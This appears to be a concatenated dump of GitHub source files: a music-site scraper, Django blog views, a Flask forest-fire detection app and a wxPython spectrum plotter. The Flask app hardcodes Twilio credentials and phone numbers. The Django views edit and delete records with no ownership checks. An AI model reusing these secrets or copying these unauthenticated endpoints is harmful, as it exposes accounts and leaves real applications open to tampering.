song[0])\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(url)\n\n def getSongBulk(baseURL, navURL):\n soup = browsePage(baseURL, navURL)\n for song in scrapAllSongZipfile(soup):\n if not song:\n print(baseURL + navURL)\n else:\n print(\"Extracting download url\")\n soup = browsePage(song[1], song[2])\n for url in scrapDownloadLink(soup):\n if not url:\n print(url)\n else:\n print(\"Downloadable\", song[1] + url)\n downloadAndExtract(url)\n\n keyInput = input(\"Enter Selection:\\n\\t1 for Top 25\\n\\t2 for Latest\\n\\t3 for Composer List\\n\\t4 for Movie List\\n: \")\n\n\n 
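# Editor's note (illustrative addition): the dispatch below maps \"1\" -> Top 25,\n    # \"2\" -> latest releases and \"3\" -> the composer list; any other key (including\n    # \"4\") falls through to the movie-list branch.\n    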
if keyInput == \"1\":\n print(\"Getting list of Top 25 songs...\")\n navURL = navURLs[\"top25\"]\n getTop25(baseURL, navURL)\n\n elif keyInput == \"2\":\n print(\"Getting list of latest movies...\")\n navURL = navURLs[\"latest\"]\n getLatest(baseURL, navURL)\n\n elif keyInput == \"3\":\n print(\"Getting list of composers..\")\n navURL = navURLs[\"composer\"]\n getComposer(baseURL, navURL)\n\n else:\n print(\"Getting list of movies...\")\n navURL = navURLs[\"movies\"]\n getMovie(baseURL, navURL)\n\n\nif __name__ == \"__main__\":\n scrapTypeList = { \"top25\":scrapTop25List,\n \"latest\":scrapLatestList,\n \"composer\":scrapComposerList,\n \"movie\":scrapMovieList,\n \"song\":scrapSongList,\n \"songBulk\": scrapAllSongZipfile}\n main()\n\n","repo_name":"arunkrish16/parseStarMusiq","sub_path":"parseStarMusiq.py","file_name":"parseStarMusiq.py","file_ext":"py","file_size_in_byte":11046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8766489903","text":"def isUniqChars(str):\n # assume characters are ASCII, total 256 characters\n # if the string is greater than 256, there is duplicate\n if len(str) > 256:\n return False\n # initialize boolean array\n hash = [False] * 256\n\n for ch in str:\n # if boolean array is true, then there is duplicate\n if hash[ord(ch)] is True:\n return False\n # if the value in hash is False, the value is not duplicate yet\n else:\n hash[ord(ch)] = True\n\n return True","repo_name":"leeyulkyu/giveMeAChance","sub_path":"isUniqChars.py","file_name":"isUniqChars.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12589474773","text":"from django.shortcuts import render, HttpResponse\nfrom .models import *\nfrom django.contrib.auth.models import User\nfrom .forms import *\nfrom django.db.models import Q\n\n# Create your views here.\ndef homepage(request):\n if \"key_word\" in request.GET:\n key = request.GET.get(\"key_word\")\n article = Article.objects.filter(Q(active=True) , Q(title__contains=key) , \n Q(text__contains=key) | Q(tags__name__contains=key)|\n Q(readers__username__contains=key)| Q(picture__contains=key)|\n Q(picture__contains=key)| Q(comments__text__contains=key))\n article = article.distinct()\n else:\n article =Article.objects.filter(active=True)\n\n return render(request , \"article/homepage.html\", locals() ) \n\ndef articles(request,tag):\n context={}\n tag = Tag.objects.get(name=tag)\n context[\"articles\"]= Article.objects.filter(tag=tag)\n return render(request, \"articles.html\",context)\n\ndef authors(request):\n authors = Author.objects.all()\n return render(request , \"article/author.html\",\n {\"authors\":authors})\n\ndef users(request):\n users_all = User.objects.all()\n return render(request , \"article/users.html\",\n {\"users_all\":users_all})\n\ndef detai(request, pk):\n article = Article.objects.get(pk=pk)\n article.views +=1\n user = request.user\n if not user.is_anonymous:\n article.readers.add(user)\n article.save()\n\n\n if request.method ==\"POST\":\n if \"delete_btn\" in request.POST:\n article = Article.objects.get(pk=pk)\n article.active = False\n article.save()\n return redirect(homepage)\n elif \"add_comment_btn\" in request.POST:\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = Comment()\n comment.user = request.user \n comment.article = article\n comment.text = form.cleaned_data[\"text\"]\n comment.save()\n\n context = {}\n context[\"article\"] 
= Article.objects.get(pk=pk)\n context[\"form\"] = CommentForm()\n\n return render(request, \"article.html\", context)\n \n\ndef edit_article(request, pk):\n article = Article.objects.get(pk=pk)\n\n if request.method == \"POST\":\n form = ArticleForm(request.POST, request.FILES, instance=article)\n if form.is_valid():\n article.title = form.cleaned_data[\"title\"]\n article.text = form.cleaned_data[\"text\"]\n article.picture = form.cleaned_data[\"picture\"]\n article.save()\n\n tags = form.cleaned_data[\"tags\"]\n for tag in tags.split(\",\"):\n obj,created = Tag.objects.get_or_create(name=tag)\n article.tag.add(obj)\n \n article.save()\n context = {}\n context[\"article\"] = article\n context[\"form\"] = CommentForm()\n context[\"message\"] = \"The article was updated successfully!\"\n\n \n return render(request , \"article/succsess.html\",context)\n\n forms = ArticleForm(instance=article)\n return render(request ,\"article/add_article.html\", {'forms':forms})\n\n\ndef add_article(request):\n if request.method == \"POST\":\n form = ArticleForm(request.POST, request.FILES)\n if form.is_valid():\n if not Author.objects.filter(user=request.user):\n author = Author(\n user= request.user ,\n name= request.user.username \n )\n author.save()\n else:\n author = Author.objects.get(user=request.user )\n\n article = Article()\n article.author = author\n article.title = form.cleaned_data[\"title\"]\n article.text = form.cleaned_data[\"text\"]\n article.picture = form.cleaned_data[\"picture\"]\n article.save()\n \n\n tags = form.cleaned_data[\"tags\"]\n for tag in tags.split(\",\"):\n obj,created = Tag.objects.get_or_create(name=tag)\n article.tag.add(obj)\n \n article.save()\n return render(request , \"article/succsess.html\")\n\n forms = ArticleForm()\n return render(request, \"article/add_article.html\", {'forms': forms})\n\ndef profile(request, pk):\n author = Author.objects.get(pk=pk)\n return render(request, \"article/profile.html\", locals())\n \n\ndef add_author(request):\n if request.method ==\"GET\":\n form = AuthorForm()\n context = {}\n context[\"form\"] = form\n return render(request,\"article/add_author.html\",context)\n\n elif request.method == \"POST\":\n form = AuthorForm(request.POST)\n if form.is_valid():\n form.save()\n return render(request,\"article/success.html\")\n\ndef edit_comment(request, pk):\n comment = Comment.objects.get(pk=pk)\n if request.method == \"POST\":\n form = CommentForm(request.POST , instance=comment)\n if form.is_valid():\n form.save()\n return render(request , \"article/succsess.html\")\n\n forms = CommentForm(instance=comment)\n return render(request ,\"article/comment_form.html\", {'forms':forms})\n \ndef delete_comment(request, pk):\n Comment.objects.get(pk=pk).delete()\n return render(request,\"article/success.html\")\n \n\n\n","repo_name":"tomebore/blog","sub_path":"itblog/article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2842332495","text":"from __future__ import division, print_function\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tensorflow.keras.preprocessing import image \nfrom tensorflow.keras.models import load_model\nfrom flask import Flask, request, render_template,url_for\nfrom werkzeug.utils import secure_filename\nimport cv2\nimport smtplib\nfrom twilio.rest import Client\nfrom pathlib import Path\nfrom playsound import playsound\n\nglobal 
graph\n#graph=tf.get_default_graph()\n# Define a flask app\napp = Flask(__name__)\nmodel = load_model('forest1.h5')\n\n\nprint('Model loaded. Check http://127.0.0.1:5000/')\n\n\n\n\n@app.route('/', methods=['GET'])\ndef index():\n # Main page\n return render_template('digital.html')\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST':\n # Get the file from post request\n f = request.files['image']\n\n # Save the file to ./uploads\n basepath = os.path.dirname(__file__)\n file_path = os.path.join(\n basepath, 'uploads', secure_filename(f.filename))\n f.save(file_path)\n img = image.load_img(file_path, target_size=(64,64))\n \n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n \n #with graph.as_default():\n preds = np.argmax(model.predict(x))\n index = [\"forest\",\"with fire\"]\n print(preds)\n text = index[preds]\n return text\n \n@app.route('/video', methods=['GET', 'POST'])\ndef opencv():\n video = cv2.VideoCapture(0)\n name = ['forest','with fire']\n while(1):\n success, frame = video.read()\n cv2.imwrite(\"image.jpg\", frame)\n img = image.load_img(\"image.jpg\", target_size=(64, 64))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n # a single forward pass is enough; argmax over the class axis gives the predicted label\n #pred = model.predict_classes(x)\n pred = np.argmax(model.predict(x), axis=1)\n print(pred)\n #cv2.putText(frame, \"predicted class = \"+str(name[pred[0]]), (100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n if pred[0]==1:\n \n cv2.putText(frame, \"predicted class = Fire Detected\" ,(100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n account_sid = 'ACae95ea785737954a0a96c91f64101221'\n auth_token = '0d013e13203434b42e0916c191b9fc6f'\n client = Client(account_sid, auth_token)\n\n message = client.messages \\\n .create(\n body='forest fire is detected,stay alert',\n # use twilio free number\n from_='+18588081954',\n # to number\n to='+918248133285')\n print(message.sid)\n \n print('Fire Detected')\n print('SMS sent!')\n audio = Path().cwd() / \"alert.mp3\"\n playsound(audio)\n #return 'Fire Detected'\n return render_template('video.html',pred=\"Fire Detected Alert Notification Sent\")\n else:\n cv2.putText(frame, \"predicted class = No Danger\",(100,100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0), 1)\n print(\"no danger\")\n #break\n cv2.imshow(\"image\",frame)\n \n if cv2.waitKey(1) & 0xFF == ord('a'): \n break\n\n video.release()\n cv2.destroyAllWindows()\n return render_template('digital.html')\n\nif __name__ == '__main__':\n app.run(threaded = False)\n\n","repo_name":"IBM-EPBL/IBM-Project-52650-1661060112","sub_path":"Final Deliverable/Web Application/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"14425251740","text":"from functools import lru_cache\nimport wx\nimport warnings\nimport os\nimport sys\nimport time\nimport datetime\nimport regex as re\nfrom dateutil import tz\nimport matplotlib as mpl\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.backends.backend_wxagg import NavigationToolbar2WxAgg as NavigationToolbar\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport warnings\n\nimport mpl_scatter_density # adds 
projection='scatter_density'\nfrom matplotlib.colors import LinearSegmentedColormap\n\nimport numpy as np\n\n#from sklearn.linear_model import LinearRegression\n#import pandas as pd\n\nfrom neumodvb.util import dtdebug, dterror\nfrom neumodvb.neumodbutils import enum_to_str\nfrom neumodvb.neumo_dialogs import ShowMessage\nimport pyspectrum\nimport pystatdb\nimport pychdb\nimport pydevdb\nimport datetime\n\n#horrible hack: matplotlib (in neumplot.py) uses the presence of this module to decide what backend to\n#use and then refuses to use wx\nif 'gi.repository.Gtk' in sys.modules:\n del sys.modules['gi.repository.Gtk']\nmpl.use('WXAgg')\n\nclass CustomToolbar(NavigationToolbar):\n \"\"\"\n toolbar which intercepts the readout cursor (which causes trouble)\n \"\"\"\n def __init__(self, canvas):\n\n super().__init__(canvas)\n\n def mouse_move(self, event):\n self._update_cursor(event)\n\n if event.inaxes and event.inaxes.get_navigate():\n\n try:\n s = event.inaxes.format_coord(event.xdata, event.ydata)\n except (ValueError, OverflowError):\n pass\n else:\n s = s.rstrip()\n artists = [a for a in event.inaxes._mouseover_set\n if a.contains(event)[0] and a.get_visible()]\n if artists:\n a = cbook._topmost_artist(artists)\n if a is not event.inaxes.patch:\n data = a.get_cursor_data(event)\n if data is not None:\n data_str = a.format_cursor_data(data).rstrip()\n if data_str:\n s = s + '\\n' + data_str\n #self.set_message(s)\n else:\n pass #self.set_message(self.mode)\n\ndef tooltips(fig):\n def update_annot(ind):\n\n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n text = \"{}, {}\".format(\" \".join(list(map(str,ind[\"ind\"]))),\n \" \".join([names[n] for n in ind[\"ind\"]]))\n annot.set_text(text)\n annot.get_bbox_patch().set_facecolor(cmap(norm(c[ind[\"ind\"][0]])))\n annot.get_bbox_patch().set_alpha(0.4)\n\n\n def hover(event):\n vis = annot.get_visible()\n if event.inaxes == ax:\n cont, ind = sc.contains(event)\n if cont:\n update_annot(ind)\n annot.set_visible(True)\n fig.canvas.draw_idle()\n else:\n if vis:\n annot.set_visible(False)\n fig.canvas.draw_idle()\n\n #fig.canvas.mpl_connect(\"motion_notify_event\", hover)\n\n\ndef plot_marks(marks, offset=-55, label='xxx', use_index=True):\n global ret\n n = len(ret[0][:,1])\n f = np.array(range(0,n))\n sig = marks*offset\n plt.plot(f, sig, '+', label=label)\n plt.legend()\n\ndef get_renderer(fig):\n try:\n return fig.canvas.get_renderer()\n except AttributeError:\n return fig.canvas.renderer\n\ndef get_bboxes(objs, r=None, expand=(1, 1), ax=None, transform=None):\n \"\"\"\n\n Parameters\n ----------\n objs : list, or PathCollection\n List of objects to get bboxes from. Also works with mpl PathCollection.\n r : renderer\n Renderer. The default is None, then automatically deduced from ax.\n expand : (float, float), optional\n How much to expand bboxes in (x, y), in fractions. 
The default is (1, 1).\n ax : Axes, optional\n The default is None, then uses current axes.\n transform : optional\n Transform to apply to the objects, if they don't return they window extent.\n The default is None, then applies the default ax transform.\n Returns\n -------\n list\n List of bboxes.\n \"\"\"\n ax = ax or plt.gca()\n r = r or get_renderer(ax.get_figure())\n try:\n return [i.get_window_extent(r).expanded(*expand) for i in objs]\n except (AttributeError, TypeError):\n try:\n if all([isinstance(obj, matplotlib.transforms.BboxBase) for obj in objs]):\n return objs\n else:\n raise ValueError(\"Something is wrong\")\n except TypeError:\n return get_bboxes_pathcollection(objs, ax)\n\nclass Tp(object):\n def __init__(self, spectrum, freq, symbol_rate):\n self.spectrum = spectrum\n self.freq = freq\n self.symbol_rate = symbol_rate\n self.scan_ok = False\n self.scan_failed = False\n\n def __str__(self):\n return f'{self.freq:8.3f}{self.spectrum.pol} {self.symbol_rate}kS/s'\n\ndef find_nearest(array,value):\n import math\n idx = np.searchsorted(array, value, side=\"left\")\n if idx > 0 and (idx == len(array) or math.fabs(value - array[idx-1]) < math.fabs(value - array[idx])):\n return idx-1\n else:\n return idx\n\ndef overlaps(a, b):\n \"\"\"\n assumes that a.xmin < b.xmin\n \"\"\"\n return b.xmin < a.xmax and (a.ymin <= b.ymin < a.ymax or b.ymin <= a.ymin < b.ymax )\n\nall_rects=[]\n\ndef remove_rects():\n global all_rects\n for rect in all_rects:\n rect.remove()\n all_rects = []\n\ndef combine_ranges(a, b):\n if a is None and b is None:\n return None\n if a is None or b is None:\n return a if b is None else b\n return (min(a[0], b[0]), max(a[1], b[1]))\n\nclass Spectrum(object):\n def __init__(self, parent, spectrum, color):\n self.spectrum = spectrum\n self.parent = parent\n self.figure = self.parent.figure\n self.axes = self.parent.axes\n self.drawn = False\n self.color = color\n sat = pychdb.sat_pos_str(self.spectrum.k.sat_pos)\n date = datetime.datetime.fromtimestamp(self.spectrum.k.start_time , tz=tz.tzlocal()).strftime(\"%Y-%m-%d %H:%M\")\n label = f'{date} {sat} {enum_to_str(self.spectrum.k.pol)} dish {self.spectrum.k.rf_path.lnb.dish_id}'\n self.label = label\n self.annots = []\n self.tps = []\n self.peak_data = None\n self.vlines = None\n self.hlines = None\n self.annot_box = ((0,0))\n self.annot_maxy = None\n self.xlimits = None # minimal and maximal frequency in this plot (initially unknown)\n self.ylimits = None # minimal and maximal signal in this plot (initially unknown)\n\n def __str__(self):\n sat = pychdb.sat_pos_str(self.spectrum.k.sat_pos)\n return f'{sat} {enum_to_str(self.spectrum.k.pol)} dish {self.spectrum.k.rf_path.lnb.dish_id}'\n\n def tps_to_scan(self) :\n return [ tp for tp in self.tps if not tp.scan_failed and not tp.scan_ok ]\n\n def clear(self):\n for a in self.annots:\n a.remove()\n self.annots=[]\n if self.spectrum_graph is not None:\n for a in self.spectrum_graph:\n a.remove()\n self.spectrum_graph = None\n if self.vlines is not None:\n self.vlines.remove()\n self.vlines = None\n\n if self.hlines is not None:\n self.hlines.remove()\n self.hlines = None\n\n def annot_for_freq(self, freq):\n found = None\n best = 20000000\n for annot in self.annots:\n delta= abs(annot.tp.freq - freq)\n if delta < best:\n found = annot\n best = delta\n return found, best\n\n def annot_for_peak(self, peak):\n found = None\n best = 20000000\n if peak is None:\n return None\n for annot in self.annots:\n delta= abs(annot.tp.freq*1000 - peak.frequency)\n if delta < best and 
annot.tp.spectrum.spectrum.k.pol == peak.pol:\n found = annot\n best = delta\n return found\n def show(self):\n if self.drawn:\n #dtdebug('clearing plot')\n #self.axes.clear()\n self.clear()\n receiver = wx.GetApp().receiver\n path = receiver.get_spectrum_path()\n spectrum_fname = ''.join([path, '/', self.spectrum.filename, \"_spectrum.dat\"])\n tps_fname = ''.join([path, '/', self.spectrum.filename, \"_peaks.dat\"])\n pol = self.spectrum.k.pol\n ret = self.process(spectrum_fname, tps_fname)\n self.drawn = True\n return ret\n\n def make_tps(self, tpsname):\n #n = len(spec[:,1])\n recompute = True\n if recompute:\n from pyspectrum import find_spectral_peaks\n peak_freq, peak_sr = find_spectral_peaks(self.spec[:,0], self.spec[:,1])\n self.peak_data = np.vstack([peak_freq, peak_sr]).T\n else:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n self.peak_data = np.loadtxt(tpsname, ndmin=2)\n if len(self.peak_data) == 0:\n return\n f = self.peak_data[:,0]\n snr = None\n for row in self.peak_data:\n tp = Tp(spectrum=self, freq=row[0], symbol_rate=row[1]/1000.)\n self.tps.append(tp)\n\n def plot_spec(self, fname):\n dtdebug(f\"loading spectrum {fname}\")\n try:\n self.spec = np.atleast_2d(np.loadtxt(fname))\n except:\n ShowMessage(f'Could not open {fname}')\n return False\n if self.parent.do_detrend:\n self.detrend()\n t = self.spec[:,0]\n a = self.spec[:,1]\n self.spectrum_graph = self.axes.plot(t, a/1000,label=self.label, color=self.color)\n return True\n\n def annot_size(self):\n s = self.parent.annot_scale_factors\n xlimits, ylimits = self.parent.get_limits()\n sx, sy = s[0] * self.parent.zoom_bandwidth, s[1] * (ylimits[1] - ylimits[0])\n dtdebug(f'annot_size: sx={sx} sy={sy} {xlimits} {ylimits}')\n return sx, sy\n\n def detrend_band(self, spec, lowidx, highidx):\n \"\"\"\n Fit a linear curve to the minima of spectral intervals of the spectrum in spec\n The parameters of the polynomial are fit between lowidx and highidx indices. This allow excluding\n part of the spectrum near 11700Ghz in a KU spectrum. 
Near that frequency it is difficult to know\n for sure if the spectrum is from the low or high lnb band (which may have an offset in its local\n oscillator)\n \"\"\"\n N = 16\n num_parts = (highidx-lowidx)//N #we split the range between lowidx and highidx in 16 parts\n if num_parts == 0:\n return\n l = num_parts*N\n #t is a list of local minima\n t= self.spec[lowidx:lowidx+l, 1].reshape([-1,num_parts]).min(axis=1)\n #f: corresponding frequencies\n f = self.spec[lowidx:lowidx+l, 0].reshape([-1,num_parts])[:,0]\n\n #compute polynomial fit\n p = np.polyfit(f, t, 1)\n\n #detrend the spectrum\n spec[:,1] -= p[0]*spec[:, 0]+p[1]\n\n def detrend(self):\n lowest_freq, highest_freq = self.spec[0, 0] , self.spec[-1,0]\n # the +8 is a heuristic, in case the highest frequencies of the Ku_low band would exceed 11700 due to lnb lof offset\n has_two_bands = (highest_freq > 11700+8) and (lowest_freq < 11700-8) and \\\n self.spectrum.k.rf_path.lnb.lnb_type == pydevdb.lnb_type_t.UNIV\n if has_two_bands:\n mid_idx1 = np.searchsorted(self.spec[:,0], 11700-8, side='left')\n mid_idx = np.searchsorted(self.spec[mid_idx1:,0], 11700, side='left') + mid_idx1\n mid_idx2 = np.searchsorted(self.spec[mid_idx:,0], 11700+8, side='left') + mid_idx\n self.detrend_band(self.spec[:mid_idx, :], 0, mid_idx1)\n self.detrend_band(self.spec[mid_idx:, :], mid_idx2, self.spec.shape[0])\n else:\n self.detrend_band(self.spec, 0, self.spec.shape[0])\n\n def ann_tps(self, tpsk, spec, offset=-64, xoffset=0):\n self.annots =[]\n if len(tpsk) == 0:\n return\n f = tpsk[:,0]\n #setting this is needed to calibrate coordinate system\n l = np.min(spec[0,0])\n r = np.max(spec[-1,0])\n w, h = self.annot_size() # un units of Mhz and dB\n xscale = (len(spec[:,0])-1)/(r - l)\n\n n = len(spec[:,0])\n w = int(w)\n idxs = np.searchsorted(spec[:,0], f, side='left')\n offset = h*1.5*1000\n self.pol = enum_to_str (self.spectrum.k.pol)\n annoty, lrflag = pyspectrum.find_annot_locations(spec[:,1], idxs, f, #f only used for debugging\n int(w*xscale), int(h*2*1000),\n offset)\n self.annot_maxy = annoty.max()/1000\n annoty /= 1000\n hlines = []\n yoffset1 = h\n yoffset2 = 2\n sig = (spec[idxs,1])/1000 + yoffset1\n vline_top = []\n bbs =[]\n for ay, s, flag, tp in zip(annoty, sig, lrflag, self.tps):\n pt=[tp.freq, s]\n pttext=[tp.freq + (0 if flag else w/10), ay]\n xoffset = 0\n txt = f\"{tp.freq:8.3f}{self.pol} {int(tp.symbol_rate)}kS/s \" if (flag & 2) \\\n else f\"{tp.freq:8.3f}{self.pol} \\n{int(tp.symbol_rate)}kS/s \";\n annot=self.axes.annotate(txt, \\\n pt, xytext=pttext, xycoords='data', \\\n ha='right' if (flag & 1) else 'left', fontsize=8)\n annot.tp = tp\n annot.set_picker(True) # Enable picking on the legend line.\n self.annots.append(annot)\n self.vlines = self.axes.vlines(f, sig, annoty+h/2, color='black')\n self.vlines.set_picker(True) # Enable picking on the legend line.\n bw = tpsk[:,1]/2000000\n self.hlines = self.axes.hlines(sig, f-bw, f+bw, color=self.color)\n self.hlines.set_picker(True) # Enable picking on the legend line.\n\n\n def process(self, specname, tpsname):\n if not self.plot_spec(specname):\n self.spectrum_graph = None\n return False\n frequency_step = round(1000*(self.spec[1:,0] - self.spec[:-1,0]).mean())\n sig = self.spec[:,1]\n self.make_tps(tpsname)\n\n #set xlimits prior to annotation to ensure the computation\n #which prevents annotations from overlapping has the proper coordinate system\n self.xlimits = int(self.spec[0,0]), int(self.spec[-1,0])\n self.ylimits = [np.min(self.spec[:,1])/1000, np.max(self.spec[:,1])/1000]\n 
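# Editor's note (assumption, added for clarity): the signal column self.spec[:,1]\n        # appears to be stored in milli-dB -- every read site divides by 1000 before the\n        # value is treated as dB -- which is why both limits are scaled here before being\n        # handed to the shared limit computation in the parent plot.\n        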
xlimits, ylimits = self.parent.get_limits() #takes into account all spectra\n\n if ylimits[1] != ylimits[0]:\n self.axes.set_ylim(ylimits)\n self.axes.set_xlim(xlimits)\n\n self.ann_tps(self.peak_data, self.spec)\n\n #set final limits\n self.xlimits = (int(self.spec[0,0]), int(self.spec[-1,0] ))\n self.ylimits = (ylimits[0], ylimits[1] if self.annot_maxy is None else self.annot_maxy )\n self.parent.get_limits.cache_clear() #needs update!\n self.ylimits = (self.ylimits[0], min(self.ylimits[1], self.ylimits[0]+30))\n xlimits, ylimits = self.parent.get_limits()\n\n self.axes.set_ylim(ylimits)\n self.axes.set_xlim(xlimits)\n return True\n\nclass SpectrumPlot(wx.Panel):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(parent, *args, **kwargs)\n self.xlimits = None\n self.ylimits = None\n self.zoom_bandwidth=500 #zoom all graphs to this amount of spectrum, to avoid overlapping annotations\n self.parent = parent\n self.spectrum = pystatdb.spectrum.spectrum()\n self.scrollbar = wx.ScrollBar(self)\n self.scrollbar.SetScrollbar(0, self.zoom_bandwidth, 2100, 200)\n self.scrollbar.Bind(wx.EVT_COMMAND_SCROLL, self.OnScroll)\n\n self.figure = mpl.figure.Figure()\n self.axes = self.figure.add_subplot(111)\n self.canvas = FigureCanvas(self, -1, self.figure)\n self.toolbar_sizer = wx.BoxSizer(wx.HORIZONTAL)\n #self.toolbar_sizer = wx.FlexGridSizer(1, 4, 0, 10)\n self.toolbar = NavigationToolbar(self.canvas)\n self.toolbar.Realize()\n self.toolbar_sizer.Add(self.toolbar, 0, wx.LEFT | wx.EXPAND)\n\n self.sizer = wx.BoxSizer(wx.VERTICAL)\n self.sizer.Add(self.toolbar_sizer, 0, wx.LEFT | wx.EXPAND)\n\n self.sizer.Add(self.canvas, proportion=1,\n flag=wx.LEFT | wx.TOP | wx.EXPAND)\n self.sizer.Add(self.scrollbar, proportion=0,\n flag=wx.LEFT | wx.TOP | wx.EXPAND)\n self.SetSizer(self.sizer)\n self.Bind (wx.EVT_WINDOW_CREATE, self.OnWindowCreate)\n self.Parent.Bind (wx.EVT_SHOW, self.OnShowHide)\n self.count =0\n from collections import OrderedDict\n self.spectra = OrderedDict()\n self.legend = None\n self.figure.canvas.mpl_connect('pick_event', self.on_pick)\n self.figure.canvas.mpl_connect('button_press_event', self.on_button_press)\n self.shift_is_held = False\n self.ctrl_is_held = False\n #self.figure.canvas.mpl_connect('key_press_event', self.set_modifiers)\n #self.figure.canvas.mpl_connect('key_release_event', self.unset_modifiers)\n self.cycle_colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n self.current_annot = None #currently selected annot\n self.current_annot_vline = None\n self.do_detrend = True\n self.pan_start_freq = None\n self.add_detrend_button()\n self.add_status_box()\n self.mux_creator = None\n wx.CallAfter(self.compute_annot_scale_factors)\n\n def add_drawn_mux(self, freq, pol, symbol_rate):\n txt = f\"{freq:8.3f}{pol} {int(symbol_rate)}kS/s \"\n dtdebug(f'Add drawn mux {txt}')\n wx.CallAfter(self.parent.OnUpdateMux, freq, pol, symbol_rate)\n\n def start_draw_mux(self, default_pol):\n if self.mux_creator is not None:\n self.mux_creator.show()\n return\n from neumodvb.draw_mux import MuxSelector\n self.mux_creator = MuxSelector(self, pol=default_pol)\n\n def set_modifiers(self, event):\n if 'shift' in event.key:\n self.shift_is_held = True\n if 'control' in event.key:\n self.ctrl_is_held = True\n def unset_modifiers(self, event):\n if 'shift' in event.key:\n self.shift_is_held = False\n if 'control' in event.key:\n self.ctrl_is_held = False\n\n def on_motion(self, event):\n pass\n\n def OnShowHide(self,event):\n if event.IsShown():\n self.draw()\n\n def 
OnWindowCreate(self,event):\n if event.GetWindow() == self:\n #self.start_freq, self.end_freq = self.parent.start_freq, self.parent.end_freq\n self.draw()\n else:\n pass\n\n def OnScroll(self, event):\n pos = event.GetPosition()\n offset =pos\n self.pan_spectrum(offset)\n\n def OnFix(self, event):\n self.adjust()\n self.canvas.draw()\n\n def draw(self):\n self.axes.clear()\n self.Fit()\n self.figure.subplots_adjust(left=0.05, bottom=0.1, right=0.98, top=0.92)\n self.axes.spines['right'].set_visible(False)\n self.axes.spines['top'].set_visible(False)\n self.axes.set_ylabel('dB')\n self.axes.set_xlabel('Frequency (Mhz)')\n xlimits, ylimits = self.get_limits()\n self.axes.set_xlim(xlimits)\n self.canvas.draw()\n\n def add_detrend_button(self) :\n panel = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)\n self.toolbar_sizer.Add(panel, 0, wx.LEFT|wx.RIGHT, 10)\n sizer = wx.FlexGridSizer(3, 1, 0)\n bitmap = wx.ArtProvider.GetBitmap(wx.ART_DEL_BOOKMARK, size=(16, 16))\n button = wx.BitmapToggleButton(panel, wx.ID_ANY, label=bitmap)\n button.SetValue(self.do_detrend)\n sizer.Add(button, 1, wx.ALIGN_CENTER_VERTICAL, border=0)\n panel.SetSizer(sizer)\n self.Bind(wx.EVT_TOGGLEBUTTON, self.OnToggleDetrend, button)\n\n def add_status_box(self) :\n self.status_box = wx.StaticText(self, -1)\n self.toolbar_sizer.Add(self.status_box, 0, wx.LEFT|wx.RIGHT|wx.ALIGN_CENTER|wx.EXPAND, 10)\n self.canvas.mpl_connect('motion_notify_event', self.UpdateStatusBar)\n self.canvas.Bind(wx.EVT_ENTER_WINDOW, self.ChangeCursor)\n\n def ChangeCursor(self, event):\n self.canvas.SetCursor(wx.Cursor(wx.CURSOR_CROSS))\n\n def UpdateStatusBar(self, event):\n if event.inaxes:\n self.status_box.SetLabel(\n f\"{event.xdata:3.3f}Mhz\\n{event.ydata:2.1f}dB\")\n\n def add_legend_button(self, spectrum, color) :\n panel = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)\n self.toolbar_sizer.Add(panel, 0, wx.LEFT|wx.RIGHT, 10)\n sizer = wx.FlexGridSizer(3, 1, 0)\n static_line = wx.StaticLine(panel, wx.ID_ANY)\n static_line.SetMinSize((20, 2))\n static_line.SetBackgroundColour(wx.Colour(color))\n static_line.SetForegroundColour(wx.Colour(color))\n\n sizer.Add(static_line, 1, wx.ALIGN_CENTER_VERTICAL, 0)\n\n button = wx.ToggleButton(panel, wx.ID_ANY, _(spectrum.label))\n sizer.Add(button, 0, 0, 0)\n button.spectrum = spectrum\n button.SetValue(1)\n\n self.close_button = wx.Button(panel, -1, \"\", style=wx.BU_NOTEXT)\n self.close_button.SetMinSize((32, -1))\n self.close_button.SetBitmap(wx.ArtProvider.GetBitmap(wx.ART_CLOSE, wx.ART_OTHER, (16, 16)))\n self.close_button.spectrum = spectrum\n sizer.Add(self.close_button, 0, 0, 0)\n\n panel.SetSizer(sizer)\n\n self.Bind(wx.EVT_TOGGLEBUTTON, self.OnToggleAnnots, button)\n self.Bind(wx.EVT_BUTTON, self.OnCloseGraph, self.close_button)\n self.Layout()\n spectrum.legend_panel = panel\n\n def make_key(self, spectrum):\n return str(spectrum.k)\n\n def toggle_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is None:\n self.show_spectrum(spectrum)\n else:\n self.hide_spectrum(spectrum)\n\n self.canvas.draw()\n wx.CallAfter(self.parent.Refresh)\n\n return False\n\n def compute_annot_scale_factors(self):\n \"\"\"\n computes self.annot_scale_factors\n when these are multiplied by the x and y limits of the the graph\n we will get the correct bounding box of double line annotions\n \"\"\"\n r = 